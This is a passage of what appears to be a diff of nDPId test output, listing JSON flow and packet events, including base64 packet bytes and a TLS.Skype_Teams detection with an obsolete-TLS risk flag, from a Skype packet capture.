-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1532,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":3,"flow_last_seen":1431969707546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969707546,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0EpBAAEAGDsDAqAEiQAQXpsO3Abu4qWeEHBLMOoAQECwc2gAAAQEICj4jiLdMP087"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1587,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969710853,"flow_last_seen":1431969710853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969710853,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1587,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1431969710853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969710853,"pkt":"0NQSxnP1PBXCt3IOCABFAABAz19AAEAG2DnAqAEinTg0HMO8nEnrI3UzAAAAALAC\/\/8PzQAAAgQFtAEDAwUBAQgKPiOVkAAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1589,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1431969711097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969711097,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtJ2dODQcwKgBIpxJw7we\/\/hU6yN1NKASOJAgZAAAAgQFrAQCCApMXGQgPiOVkAEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":1431969711097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969711097,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CpBAAEAGnRXAqAEinTg0HMO8nEnrI3U0Hv\/4VYAQECx2mwAAAQEICj4jloNMXGQg"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1354,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698797,"flow_last_seen":1431969698797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969698797,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1354,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1431969698797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969698797,"pkt":"0NQSxnP1PBXCt3IOCABFAABASetAAEAG9Y7AqAEiF84hpsOqAbtGC\/RmAAAAALAC\/\/+XCwAAAgQFtAEDAwUBAQgKPiNmuAAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1355,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":2,"flow_last_seen":1431969698840,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969698840,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7w6oZSGV1Rgv0Z6ASOJDhugAAAgQFrAQCCArsLyLPPiNmuAEDAwU="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1356,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":3,"flow_last_seen":1431969698840,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969698840,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ZSJAAEAG2mPAqAEiF84hpsOqAbtGC\/RnGUhldoAQECw4twAAAQEICj4jZuLsLyLP"} +00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1357,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969698797,"flow_last_seen":1431969698841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1431969698841,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1358,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969699142,"flow_last_seen":1431969699142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969699142,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1358,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1431969699142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969699142,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQstAAEAGrVjAqAEinTfrksOrAbuMrH5PAAAAALAC\/\/911AAAAgQFtAEDAwUBAQgKPiNoDgAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1360,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1431969699217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969699217,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIgG7w6sASTQ1jKx+UKASOJCu2QAAAgQFrAQCCApMXR6HPiNoDgEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1361,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":3,"flow_last_seen":1431969699217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969699217,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ol1AAEAGTdLAqAEinTfrksOrAbuMrH5QAEk0NoAQECwFuQAAAQEICj4jaFlMXR6H"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1367,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969699577,"flow_last_seen":1431969699577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969699577,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50092,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1367,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1431969699577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969699577,"pkt":"0NQSxnP1PBXCt3IOCABFAABAuMZAAEAGoFTAqAEinTeCm8OsnFQhlXAyAAAAALAC\/\/+7tgAAAgQFtAEDAwUBAQgKPiNpvQAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1371,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":2,"flow_last_seen":1431969699706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969699706,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYh+dN4KbwKgBIpxUw6wV0QgaIZVwM6ASOJCGcAAAAgQFrAQCCApOs6EPPiNpvQEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1372,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":3,"flow_last_seen":1431969699706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969699706,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0BLVAAEAGVHLAqAEinTeCm8OsnFQhlXAzFdEIG4AQECzdGQAAAQEICj4jaj5Os6EP"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1390,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969701181,"flow_last_seen":1431969701181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969701181,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1390,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1431969701181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969701181,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1hBAAEAGgwrAqAEinTeCm8OuAbux\/OLXAAAAALAC\/\/9NAwAAAgQFtAEDAwUBAQgKPiNv+wAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1431969701308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969701308,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYh+dN4KbwKgBIgG7w655m4Wssfzi2KASOJA0zwAAAgQFrAQCCApOs6KgPiNv+wEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":3,"flow_last_seen":1431969701308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969701308,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0yA5AAEAGkRjAqAEinTeCm8OuAbux\/OLYeZuFrYAQECyLfQAAAQEICj4jcHdOs6Kg"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969704663,"flow_last_seen":1431969704663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969704663,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1431969704663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969704663,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjY9AAEAGMVPAqAEib91KLsOwnFtwFABlAAAAALAC\/\/8u+gAAAgQFtAEDAwUBAQgKPiN9hAAAAAAEAgAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1462,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969704664,"flow_last_seen":1431969704664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969704664,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50097,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1431969704664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969704664,"pkt":"0NQSxnP1PBXCt3IOCABFAABAvDNAAEAGM9LAqAEinTfrsMOxnFbKZQg9AAAAALAC\/\/\/99wAAAgQFtAEDAwUBAQgKPiN9hAAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1463,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969704664,"flow_last_seen":1431969704664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969704664,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50098,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1431969704664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969704664,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIjNAAEAGNnTAqAEiQTffD8OynFri9dA8AAAAALAC\/\/+GBAAAAgQFtAEDAwUBAQgKPiN9hAAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":2,"flow_last_seen":1431969704743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969704743,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+gmdN+uwwKgBIpxWw7HlrcetymUIPqASOJDOiAAAAgQFrAQCCApF6hSRPiN9hAEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1465,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":3,"flow_last_seen":1431969704743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969704743,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0NN1AAEAGuzTAqAEinTfrsMOxnFbKZQg+5a3HroAQECwlZAAAAQEICj4jfdNF6hSR"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1467,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":1431969704794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969704794,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYatBN98PwKgBIpxaw7KHsi8C4vXQPaASOJCmxwAAAgQFrAQCCAouudI2PiN9hAEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1468,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":3,"flow_last_seen":1431969704794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969704794,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0iwlAAEAGzanAqAEiQTffD8OynFri9dA9h7IvA4AQECz9cAAAAQEICj4jfgUuudI2"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1478,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":2,"flow_last_seen":1431969704959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969704959,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOZv3UouwKgBIpxbw7DJYD8HcBQAZqASOJBMRQAAAgQFrAQCCApNhWUvPiN9hAEDAwk="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1479,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":3,"flow_last_seen":1431969704959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969704959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04b5AAEAG3S\/AqAEib91KLsOwnFtwFABmyWA\/CIAQECyiSwAAAQEICj4jfqhNhWUv"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1490,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969705713,"flow_last_seen":1431969705713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969705713,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1490,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1431969705713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969705713,"pkt":"0NQSxnP1PBXCt3IOCABFAABAO5ZAAEAG5a3AqAEiQAQXpsOznFablHTpAAAAALAC\/\/\/tRQAAAgQFtAEDAwUBAQgKPiOBlwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":1431969705916,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969705916,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIpxWw7Pn2AWqm5R06qASOJA+QQAAAgQFrAQCCApMP02qPiOBlwEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":3,"flow_last_seen":1431969705916,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969705916,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0dcVAAEAGq4rAqAEiQAQXpsOznFablHTq59gFq4AQECyUoQAAAQEICj4jgmFMP02q"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1501,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969706277,"flow_last_seen":1431969706277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969706277,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1431969706277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969706277,"pkt":"0NQSxnP1PBXCt3IOCABFAABALAFAAEAGkuHAqAEib91KLsO0AbvHHCHtAAAAALAC\/\/9KwwAAAgQFtAEDAwUBAQgKPiODxwAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1502,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969706277,"flow_last_seen":1431969706277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969706277,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1502,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1431969706277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969706277,"pkt":"0NQSxnP1PBXCt3IOCABFAABApn5AAEAGSYfAqAEinTfrsMO1AbsGcnDPAAAAALAC\/\/\/trQAAAgQFtAEDAwUBAQgKPiODxwAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1503,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969706277,"flow_last_seen":1431969706277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969706277,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1431969706277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969706277,"pkt":"0NQSxnP1PBXCt3IOCABFAABAkWpAAEAGxzzAqAEiQTffD8O2Abu4rlNDAAAAALAC\/\/\/BnQAAAgQFtAEDAwUBAQgKPiODxwAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1505,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":2,"flow_last_seen":1431969706353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969706353,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+gmdN+uwwKgBIgG7w7Xvxq\/pBnJw0KASOJDKVgAAAgQFrAQCCApF6hYkPiODxwEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1506,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":3,"flow_last_seen":1431969706354,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969706354,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0l01AAEAGWMTAqAEinTfrsMO1AbsGcnDQ78av6oAQECwhNQAAAQEICj4jhBNF6hYk"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1508,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":2,"flow_last_seen":1431969706407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969706407,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYatBN98PwKgBIgG7w7bIenZGuK5TRKASOJBYwQAAAgQFrAQCCAouudPJPiODxwEDAwk="} 